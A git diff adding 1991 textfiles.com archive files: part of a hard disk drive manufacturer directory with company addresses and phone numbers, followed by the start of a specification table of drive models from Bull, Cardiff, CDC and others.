PRIAM SYSTEMS Corp. WATTS LINE: + 1140 Ringwood Court PAY PHONE:(408)945-8680 + San Jose CA 95131 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECHNOLOGY, Inc. WATTS LINE: + 200 McCormick PAY PHONE:(714)549-9449 + Costa Mesa CA 92626 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + QUANTUM Corporation WATTS LINE: + 1804 McCarthy Blvd. PAY PHONE:(408)432-1100 + Milpitas CA 95035 FAX LINE:(408)943-0689 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RICOH Corp. (File Products Div.) WATTS LINE: + 5150 ElCamino Real, Suite D-20 PAY PHONE:(415)962-0443 + Los Altos CA 94022 FAX LINE:(415)962-0441 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + RODIME SYSTEMS, Inc. WATTS LINE:(800)688-9390 + 901 Broken Sound Pkwy., N.W. PAY PHONE:(407)994-6200 + Boca Raton FL 33487 FAX LINE:(407)997-6135 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + þ + + + HARD DISK DRIVE MANUFACTURER DIRECTORY + + 1/03/91 THEREF(tm) Version 4.1 PAGE 6 + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + SEAGATE TECHNOLOGY WATTS LINE:(800)468-3472 + 930 Disc Drive PAY PHONE:(408)438-6550 + Scotts Valley CA 95066-4544 FAX LINE:(408)438-0558 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SEAGATE TECHNOLOGY (IMPRIMIS, CDC) WATTS LINE:(800)828-8001 + 12501 Whitewater Drive PAY PHONE:(612)936-6271 + Minnetonka MN 55343 FAX LINE:(612)936-6232 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SIEMENS INFORMATION SYSTEMS, Inc. WATTS LINE: + 1077 Business Center Circle PAY PHONE:(805)375-2500 + Newbury Park CA 91320 FAX LINE:(805)499-2051 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + STORAGE DIMENSIONS WATTS LINE: + 2145 Hamilton Avenue PAY PHONE:(408)879-0300 + San Jose CA 95125 FAX LINE:(408)879-9330 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYQUEST TECHNOLOGY WATTS LINE: + 47923 Warm Springs Blvd. PAY PHONE:(415)490-7511 + Fremont CA 94539 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + SYSGEN, Incorporated WATTS LINE:(800)821-2151 + 556 Gibraltar Drive PAY PHONE: + Milpitas CA 95035-9868 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDON Corporation WATTS LINE: + 405 Science Drive PAY PHONE:(805)523-0340 + Moorpark CA 93021 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TANDY Corporation WATTS LINE: + 1800 One Tandy Center PAY PHONE:(817)390-3011 + Fort Worth TX 76102 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TEAC Inc. (Data Storage Prod. Div.) WATTS LINE: + 7733 Telegraph Road PAY PHONE:(213)726-0303 + Montebello CA 90640 FAX LINE:(213)727-7621 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TEXAS INSTRUMENTS, Incorporated WATTS LINE: + (no longer offers support) PAY PHONE: + FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TOSHIBA AMERICA, Inc. (Disk Div.) WATTS LINE:(800)456-DISK + 9740 Irvine Blvd,PO Box 19724 PAY PHONE:(714)583-3108 + Irvine CA 92713-9724 FAX LINE:(714)583-3133 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + TULIN Corporation WATTS LINE: + 2156 O'Toole Avenue PAY PHONE:(408)432-9025 + San Jose CA 95131 FAX LINE:(408)943-0782 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + þ + + + HARD DISK DRIVE MANUFACTURER DIRECTORY + + 1/03/91 THEREF(tm) Version 4.1 PAGE 7 + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + VERTEX WATTS LINE: + (See PRIAM "V" series) PAY PHONE: + FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + WESTERN DIGITAL Corporation WATTS LINE:(800)832-4778 + 2445 McCabe Way PAY PHONE:(714)863-0102 + Irvine CA 92714 FAX LINE:(714)660-4909 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + XEBEC WATTS LINE: + 3579 Gordon PAY PHONE:(702)883-4000 + Carson City NV 89701 FAX LINE: + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + þ diff --git a/textfiles.com/computers/hd_ref41.lan b/textfiles.com/computers/hd_ref41.lan new file mode 100644 index 00000000..9c1cf8a7 --- /dev/null +++ b/textfiles.com/computers/hd_ref41.lan @@ -0,0 +1,3289 @@ + + + + + + + + + HARD DISK DRIVE DIRECTORY + + 9:45:50 pm THEREF(tm) Version 4.1 1/03/91 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + + PAGE 1 + --SIZE-- -----CAPACITY---- PRE- S/ # RW HD INTER- RECORD TKS AVE XFER POWER + MANUFACTURER MODEL NUMBER WTH. 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HGT. UNFORMAT FORMATED CYLS COMP TK PL HD AC FACE METHOD IN. P? ACC RATE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + BULL D-570 70.0MB 59.0MB 987 17 4 7 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + BULL D-585 85.0MB 1166 4 7 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + C.ITOH & Co. YD-3042 3.50 HALF 43.5MB 788 2 4 SCSI RLL(2,7) 1104 28mS 8.5Mb 40K 12.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + C.ITOH & Co. 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YD-3540 5.25 HALF 45.0MB 731 17 4 7 ST412 MFM 26mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF F-3053 3.50 HALF 53.0MB 44.0MB 1024 17 3 5 ST412 MFM 20mS 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF F-3080E 3.50 HALF 80.0MB 68.0MB 1024 26 3 5 ESDI RLL(2,7) 20mS 7.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF F-3080S 3.50 HALF 80.0MB 68.0MB 1024 26 3 5 SCSI RLL(2,7) 20mS 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF F-3127E 3.50 HALF 127.0MB 109.0MB 1024 35 3 5 ESDI RLL(2,7) 20mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CARDIFF F-3127S 3.50 HALF 127.0MB 109.0MB 1024 35 3 5 SCSI RLL(2,7) 20mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 77731608 5.25 FULL 29.0MB 670 128 17 3 5 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 77731613 5.25 FULL 733 128 17 3 5 ST412 MFM 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC BJ7D5A 77731614 5.25 FULL 23.0MB 670 17 2 4 ST412 MFM 36mS + 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Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-134 3.50 HALF 134.0MB 1068 36 4 7 VC SCSI RLL(2,7) Y 15mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-155 3.50 HALF 156.0MB 138.0MB 1068 4 7 VC SCSI RLL(2,7) Y 15mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-155S 3.50 HALF 156.0MB 138.0MB 1068 4 7 VC SCSI-2 RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-160 3.50 HALF 162.0MB 142.0MB 1068 36 5 9 VC SCSI RLL(2,7) Y 15mS 8.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-172 3.50 HALF 172.0MB 1068 36 5 9 VC SCSI RLL(2,7) Y 15mS 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-186S 3.50 HALF 186.0MB 163.0MB 1268 4 7 VC SCSI-2 RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-200 3.50 HALF 201.0MB 177.0MB 1068 36 5 9 VC SCSI RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-200S 3.50 HALF 201.0MB 177.0MB 1068 36 5 9 VC SCSI-2 RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94351-230S 3.50 HALF 239.0MB 210.0MB 1273 36 5 9 VC SCSI-2 RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-111 3.50 HALF 111.0MB 98.0MB 1072 3 5 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-126 3.50 HALF 126.0MB 111.0MB 1072 29 4 7 VC IDE(AT) RLL(2,7) Y 15mS 8.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-133 3.50 HALF 133.0MB 117.0MB 1272 29 3 5 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CDC SWIFT 94354-155 3.50 HALF 156.0MB 138.0MB 1072 29 4 7 VC IDE(AT) RLL(2,7) Y 15mS 10.0Mb 70K 11.0W + 